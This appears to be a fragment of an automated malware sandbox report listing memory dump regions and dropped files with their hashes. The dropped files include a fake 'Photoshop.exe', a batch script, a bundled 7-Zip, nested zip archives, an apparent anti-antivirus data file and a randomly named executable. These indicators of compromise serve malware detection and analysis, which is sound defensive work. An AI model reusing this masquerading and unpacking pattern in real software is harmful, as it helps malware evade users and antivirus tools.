SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/4796-33-0x000001EEE4E30000-0x000001EEE4E40000-memory.dmp

memory/1344-44-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

memory/1344-45-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

memory/1344-46-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

memory/1344-47-0x000001AB2DDB0000-0x000001AB2DDF4000-memory.dmp

memory/1344-48-0x000001AB2DE80000-0x000001AB2DEF6000-memory.dmp

memory/1344-49-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

memory/1344-50-0x000001AB2CEC0000-0x000001AB2CED0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 8e226f7bc83ade32a4c39fdde45b815c
SHA1 198a4a9ca47eac8ac08501287c3a950206183fc2
SHA256 be7d057cd4a046d6c757f4c72a2457496dacde193394dc9d84c6f9b2ff11af32
SHA512 dded955bf387102cef9998d5fc2ca548c414555ce677d81013ee9e9591a62191b7190dcf1f081ca7c7bca90d36037800b0e6379069294f43eb1c626e272332eb

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 79851029bfda0d50d9e1f24602a7f56e
SHA1 51619ce355236c248cacef8c41fd305871067903
SHA256 919dba5dd119272c034abab608286c54cd15cf86540d18f418e144972bd3acc9
SHA512 ce17defa6554d6634c5b07758a753baae4c2dee55b168fa2ac5bb5e820b264be54584fdc972291817e455f2c3bda18f3eb2e0908db092485bb78e88b73bb5a0c

C:\Users\Admin\AppData\Roaming\Photoshop.exe

MD5 158612e8d70c41c7e577d6635fe7db84
SHA1 1cd024fe5e63055e07270f309d3a091913f9c516
SHA256 e2b0351022ec23b7c9204cf1f3b23fc98d5e7ee180ceb6f4fb7512eaf3594ecd
SHA512 8c03cd134d0a5efeae615fac59ee8af3f9f19cc397cd75cf741c1ce3f21dd6d536ff455ed94cb263464491dc112cd2355537682a0b3275b40268b1fc1459e1ce

memory/1344-63-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

memory/4796-65-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 12b875e85a885c81bc04161e9df9151a
SHA1 7d9e32a575e487611abb182b4d89b1ab4f4e7a06
SHA256 97e80e083ba83a031bb03097cd81d86708165cd7eb1c070782e6a7234de784a5
SHA512 3ba38a4024287bcaeee208a1c0158fae73a86d5581cf566309985bbd204e810eb5fd099a1816a9326c9e25bb08a2da20f2a4884978eb4e4ed8a3762c1057d0ca

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 afaebf70e6daf7bf2e07cd11f93ee4a1
SHA1 4e8b08b3e50f860955bd00d16fc1653c07b7c608
SHA256 4a9d76fb9d77efaf81616e750b928ba3955599acafb2c0fec0d7ce412db0f47b
SHA512 4db3a63f03f8816b85fdb905e2a2f08967f9f3735206f08f2cae8b8cd561e8563d2f92c188d32b94fdb6d472e07c5f41f54e26673f8a81449454225220ba397f

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

MD5 9e57c6bb6dfb456cd9907844b7afafbd
SHA1 daee76439ed4cd77192dc5c2d52b187f18e5ba99
SHA256 729dbb0bd855dc1c1cf59366f49e29cb2b6e0d1279270924d2b131d7df749eab
SHA512 3a99dae0a7c4ac47c5143dd6ada9a485cf115d3d9b172c3ba6d0847d6848e41defccd3a4eaf1b44c3ae46820c2164127b4e1ceaa5e07a8028e9b38f823a5960b

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

MD5 4ab6b1ed8f26df37c531a80147982511
SHA1 25d59710197c30eee836096dfcce139ba84f978a
SHA256 33f73488015443cc05fa02d1c0723921502de5cac3206cf9fc433472a2afb162
SHA512 a582e4cd93baf45b48aad086ffc5edab4ec899cbd029e9e740e93cf34a2aff492f14c92ed2efc0339fc4eed979311600007fca3075abda28232d9d351dd49e24

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

MD5 210ee7f34c0ff268d33d598a49eb889a
SHA1 876dea438f3f365513159630a12a2192fecd8b7f
SHA256 9d8ee7edf36676633d624774cb194a45ef8ae286cb5e9591d46c20be57a9282f
SHA512 383bb66f996b858d4ef23eed2264c4f890d47aca7b3da88587e3bb6454183f8d35e44411b08eecafe3fbb0638610cd872d1d00402dd8ff0b660102a44b53bcb1

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 763cb011f068f184a672e254d3ce3c39
SHA1 59eb148e6ad321cac5396e6a58c1528f7932befb
SHA256 d25782f4a9573c40747458b6916e9332b34a349b3011ec85dd5d11a583a87105
SHA512 530b8c0ad90b53f38cd56ffaf3766f33167c9922e55f8485ca87019275730c94dd6a84a1d9578163c45bae2743cf6981041f9ccc97ceb822f8d607f94a0c1d28

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 5f79b89dbaf23387caa818b0da7b8ea2
SHA1 3c38d94819331fd551c07048841cfe6ecbf29e18
SHA256 7abc58d9dd3dee48f88629c8dcaf12e72a337f8bf1dbce59d464ab6ed698b726
SHA512 a6381f3b0d3184ab098e9a40ca65dd1cec76cb7e0cfe13a5c2d188e4c8e6d077286c70a366ad6ffc7e7f68faa6240a730b7034fcaa00d1c1f0922e42c1edb8fc

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 47e8ed572da00474326b4cee8f85b005
SHA1 94bceabdc880c41d73d6c984a9d61c31dd29ce91
SHA256 abd52eb132c8c23669233a656f036a0e07692efd398894b724b61b66a75564af
SHA512 31da04b57f0ef1b3363a3fa4855ca576d9159d374de0d2d9defb5524e67fed740441dcc2245a246daecab6260a419c02a32770ee9be53a2ddbede9dd4848d624

C:\Users\Admin\AppData\Local\Temp\main\extracted\nmYIeCI7gcMH.exe

MD5 53c6cf5bf9ce4922b3dc9bf9cc2374a2
SHA1 b9a0d229a47fadaaa0898d32dce3aac279ac8569
SHA256 2bb1a0a95249e3bcca1fdfc740bc91df10dc9c8cd834707a0b5a31883eb6867e
SHA512 d323cfdfc3db5c5ce70ba572c0c657def11c3b36703a029977f5c5ddfdb278dfd1eea8950686d7a566dcd550aa0c854ceb035e6e67fcb377a8fc50dc4e0cd64c

memory/4496-129-0x0000000000160000-0x000000000016A000-memory.dmp

memory/4496-135-0x0000000000160000-0x000000000016A000-memory.dmp

memory/4496-136-0x0000000000160000-0x000000000016A000-memory.dmp

memory/4496-137-0x0000000000160000-0x000000000016A000-memory.dmp

memory/4496-140-0x0000000000610000-0x0000000000611000-memory.dmp